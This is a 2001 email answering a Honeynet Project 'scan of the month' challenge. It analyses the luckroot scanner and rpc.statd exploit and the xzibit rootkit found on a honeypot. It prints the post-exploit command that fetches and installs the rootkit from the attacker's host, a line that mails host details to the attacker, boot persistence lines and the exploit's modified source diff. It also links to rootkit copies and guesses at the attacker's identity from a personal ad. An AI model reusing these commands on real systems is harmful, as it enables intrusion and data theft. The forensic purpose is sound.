From gfk@logidac.com Sat Mar 17 20:01:49 2001 Date: Mon, 5 Mar 2001 22:09:00 -0500 From: Guillaume Filion To: project@honeynet.org Subject: Scan of the month [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] Hi, Here's my try at scan13. It was not very hard, but it was quite long, it took me two evenings to do! Nevertheless I'm happy to have done it, as it has improved my knowledge of how rootkits work, especially Linux Rootkit. ### 1. What is the blackhat attempting to do with his command line syntax? The attacker downloads a scanning tool called luckroot and decompresses it. After that, the blackhat sends commands to do port 111 vulnerability scans and root gain for those subnets: 216.210.0.0/16 200.120.0.0/16 64.120.0.0/16 216.200.0.0/16 63.1.0.0/16 216.10.0.0/16 210.120.0.0/16 64.1.0.0/16 216.1.0.0/16 194.1.0.0/16 210.128.0.0/16 24.1.0.0/16 12.20.0.0/16 We see that the attacker strangely tries to scan the same subnet twice, maibe because the Honeypot is behind a reversed firewall and the scanning tool is reporting that it cannot connect to anything... I'm not sure about that, maibe he's just drunk... 8*) We can also see that the attacker has fat fingers (okay he must be drunk), since it takes hims 4 tries to be able to type correctly "tar -zxvf LUCKROOT.TAR". BTW, the z flag is useless since the archive is not gzipped. ### 2. What does the tool accomplish? The tool is an impressive all-in-one scan/access gain tool. First it scans a user specified subnet for vulnerables RedHat6.x sunrpc. If it finds one, it automatically does the exploit. If the exploits works, it downloads a rootkit and installs it on the exploited box. ### 3. How does the tool work? The script luckgo compiles the files luckscan-a.c and luckstatdx.c if they are not allready. After that it opens a process of the freshly compiled scanner luckscan-a to scan a user specified subnet on port 111 (sunrpc). If luckscan-a finds a target with an open sunrpc port, it starts the exploit luckstatdx. luckstatdx tries to exploit sunrpc on Linux boxes running RedHat 6.0, RedHat 6.1 or RedHat 6.2. If the exploits is successfull, luckstatdx sends the following command to the attacked box: cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz In short, this command downloads a rootkit called xzibit and installs it on the attacked box. You can download xzibit at the attacker site (http://www.becys.org/xzibit.tar.gz) or you can fetch a copy on mine (http://logidac.com/gfk/xzibit.tar.gz). Here's a description of what xzibit does: xzibit installs trojaned versions of netstat, ps, ifconfig and top, I guess these are taken from lrk (linux rootkit). It creates a file /dev/caca containing: ----- 1 193.231.139 1 213.154.137 1 193.254.34 3 6969 3 3666 3 31221 3 22546 4 6969 4 2222 ----- The string /dev/caca is present in the trojaned version of netstat. My guess is that it is a copy of lrk's netstat. Here's the part the lrk's README talking about netstat: ----- netstat - Modified to remove tcp/udp/sockets from or to specified addresses, uids and ports. The file is ROOTKIT_ADDRESS_FILE. default data file: /dev/ptyq type 0: hide uid type 1: hide local address type 2: hide remote address type 3: hide local port type 4: hide remote port type 5: hide UNIX socket path example: 0 500 <- Hides all connections by uid 500 1 128.31 <- Hides all local connections from 128.31.X.X 2 128.31.39.20 <- Hides all remote connections to 128.31.39.20 3 8000 <- Hides all local connections from port 8000 4 6667 <- Hides all remote connections to port 6667 5 .term/socket <- Hides all UNIX sockets including the path .term/socket ----- Lines starting with '1' are /24 subnets, 193.231.128.0/19 belongs to the Romanian Education Network, 213.154.135-140.0-255 belongs to PCNET - ATM-ADSL Network (Bucharest, Romania) and 193.254.32.0/19 belongs to LOGIC TELECOM SA, Romania. My guess is that they're subnets that the attacker "0wnz". The trojaned Netstat will hide connections from these subnets. It will also hide local connections from ports 6969, 3666, 31221, 22545 and to port 6969, 2222. The rootkit also creates a file /dev/dsx containing: ----- 3 sl2 3 sshdu 3 linsniffer 3 smurf 3 slice 3 mech 3 muh 3 bnc 3 psybnc ----- The string /dev/dsx is present in the trojaned ps and top, I guess these are the processes that should hidden. Here's the part the lrk's README talking about ps: ----- ps - Modified to remove specified processes. The file used is ROOTKIT_PROCESS_FILE, default to /dev/ptyp. An example data file is as follows: 0 0 Strips all processes running under root 1 p0 Strips tty p0 2 sniffer Strips all programs with the name sniffer 3 hack Strips all programs with 'hack' in them ie. proghack1, hack.scan, snhack etc. Don't put in the comments, obviously. Note: if this doesn't seem to work make sure there are no spaces after the names, and don't use the full path name. ----- So ps and top will hide every processes containing sl2, sshdu, linsniffer, smurf, slice, mech, muh, bnc or psybnc. The rootkit then creates the folder /dev/ida/.inet and installs, among other things, a sshd daemon (sshdu) and a portsniffer (linsniffer) in the folder. The files installed are: linsniffer portsniffer logclear script to delete sniffer's log and restart linsniffer sense Sorts the output from LinSniffer sl2 DoS tool based on synk4 (my guess) sshdu sshd daemon (maibe with a backdoor) s sshd daemon configuration file ssh_host_key sshd daemon host key ssh_random_seed sshd daemon random seed The sshdu daemon runs on port 6969, it accepts RSAAuthentification and PasswordAuthentification. I'm pretty sure that a backdoor is present in sshdu, but I couldn't find it... linsniffer is a standard portsniffer (the source is available on packetstorm http://packetstorm.securify.com/Exploit_Code_Archive/linsniffer.c), it's also part of lrk. linsniffer will sniff those tcp ports: 21 ftp, 23 telnet, 110 pop3, 109 pop2, 143 imap2, 513 rlogin, 106 poppasswd. The rootkit also installs a shell script in /usr/bin/hdparm: ----- #!/bin/sh cd /dev/ida/.inet ./sshdu -f ./s ./linsniffer >> ./tcp.log & cd / ----- It modifies /etc/rc.d/rc.sysinit to run hdparm (that is the sshd backdor and the sniffer) on every boot: ----- echo "/usr/bin/hdparm -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit ----- It also tries to install a CGI backdoor becys.cgi. Last thing, it sends some nice infos to the owner: ----- touch /tmp/info /sbin/ifconfig | grep inet >> /tmp/info hostname -f >> /tmp/info uname -a >> /tmp/info cat /tmp/info | mail -s "becys rewting" becys@becys.org rm -f /tmp/info ----- ### 4. Is this tool a worm, or would you classify it as something else? The jargon file defines a worm as: ----- worm n. [from `tapeworm' in John Brunner's novel "The Shockwave Rider", via XEROX PARC] A program that propagates itself over a network, reproducing itself as it goes. Compare virus. Nowadays the term has negative connotations, as it is assumed that only crackers write worms. Perhaps the best-known example was Robert T. Morris's Great Worm of 1988, a `benign' one that got out of control and hogged hundreds of Suns and VAXen across the U.S. See also cracker, RTM, Trojan horse, ice. ----- (ref: http://www.tf.hut.fi/cgi-bin/jargon?search=worm) I would not call this tool a worm, because it does not reproduce itself, the rootkit copied to the victim's computer is not luckroot but xzibit. This does not fit the recursive nature of a worm. To fit in the definition of a worm, the luckstatdx exploit should download luckroot to the victim's computer and scan other targets. ### 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? luckstatdx.c is a slightly modified version of statdx.c: *** statdx *** Redhat Linux 6.0/6.1/6.2 rpc.statd remote root exploit (IA32) *** by ron1n *** *** August 3, 2000 *** Sydney, Australia statdx.c is avaible on packetstorm: http://packetstorm.securify.com/0008-exploits/statdx.c Here's a (reduced) diff between the original statdx.c and luckstatdx.c: ----- [gfk@cesam scan13]$ diff statdx.c luckstatdx.c [...SNIP...] 261c162 < fprintf(stderr, "statdx by ron1n \n"); --- > fprintf(stderr, "statdx modify by becys \n"); 286a188 > // Becys was modify herre some cmd. 288c190 < send(sockd, "cd /; ls -alF; id;\n", 19, 0); --- > send(sockd, "cd /; uname -a; id; wget -nd >http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd >lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); 289a192 > // Aici cred ca trebuie un exit. 349c252 < printf("OMG! You now have rpc.statd technique!@#$!\n"); --- > printf("You now have a new server rooted with rpc.statd >technique and becys|ReSpEkT scan-h4x0r !\n"); 597c500 < printf("A timeout was expected. Attempting connection to shell..\n"); --- > printf("Hmm,maibe i can root it. Attempting connection to >shell..\n"); 599c502 < printf("Failed\n"); --- > printf("Fucking shit,i cant,sorry.\n"); 611d513 < ----- As for luckscan-a.c, I found at http://www.self-evident.com/security/scanners/pscan-a.c.gz almost the exact same program but called pscan-a.c I also found at http://security.tsu.ru/info/unix/lance/README.cracker.txt the README for a package called cracker.pl which says: ----- Also shouts to Volatile, a person I dont know but I'm using his pscan in this package without his permission. (which I think is semi-private) ----- The difference between luckscan-a.c and pscan-a.c is that luckscan-a.c does start luckstatdx if it finds a vulnerable target. pscan-a.c: ----- else { printf("%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr), (time(0)-connlist[i].a)); close(connlist[i].s); connlist[i].status = S_NONE; } ----- luckscan-a.c: ----- else { char luck[100]; sprintf(luck,"./luckstatdx -d 0 %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a)); printf("Lets try to root the %s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr), (time(0)-connlist[i].a)); system(luck); printf("We continue to h4x0r ...\n"); close(connlist[i].s); connlist[i].status = S_NONE; } ----- As for the xzibit rootkit, is uses ps, netstat, top and ifconfig of lrk. ### Bonus Question: What information can you obtain about who is using or created the tool? luckroot announces itself with the following header: ----- http://www.becys.org .:[becys@becys.org]:. ----- The xzibit rootkit is available at http://www.becys.org/xzibit.tar.gz and it sends data to becys@becys.org. So it looks like the domain becys.org has something to do with the attack. It looks like becys@yahoo.com also belongs to the attacker. The server www.becys.org is hosted at WEBSITESOURCE.COM which rents its rackspace at Alabanza.com (hey, the same as me! (logidac.com)). A search on Google for becys give some nice infos about the attacker: http://www.rdsnet.ro/rds-bin/publicitate_detaliu?anunttype_id=1 : ----- 19-Oct-2000 Vand chip tunning-uri originale din Germania/Austria pentru motoare Diesel. O crestere performanta a c.p. ai motorului. Pentru mai multe informatii nu ezita sa ma contactezi . PRETURI LA SFERTUL PIETEI . becys@yahoo.com 093837243 ----- Ok, I don't speak Romanian, but it's a Romanian server and contains becys@yahoo.com. It looks like the attacker has a car for sale. 8*) Best, GFK's -- Guillaume Filion Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/ PGP Key: http://guillaume.filion.org/pgp (this will redirect) PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA [ Part 2, Application/PGP-SIGNATURE 229bytes. ] [ Unable to print this part. ]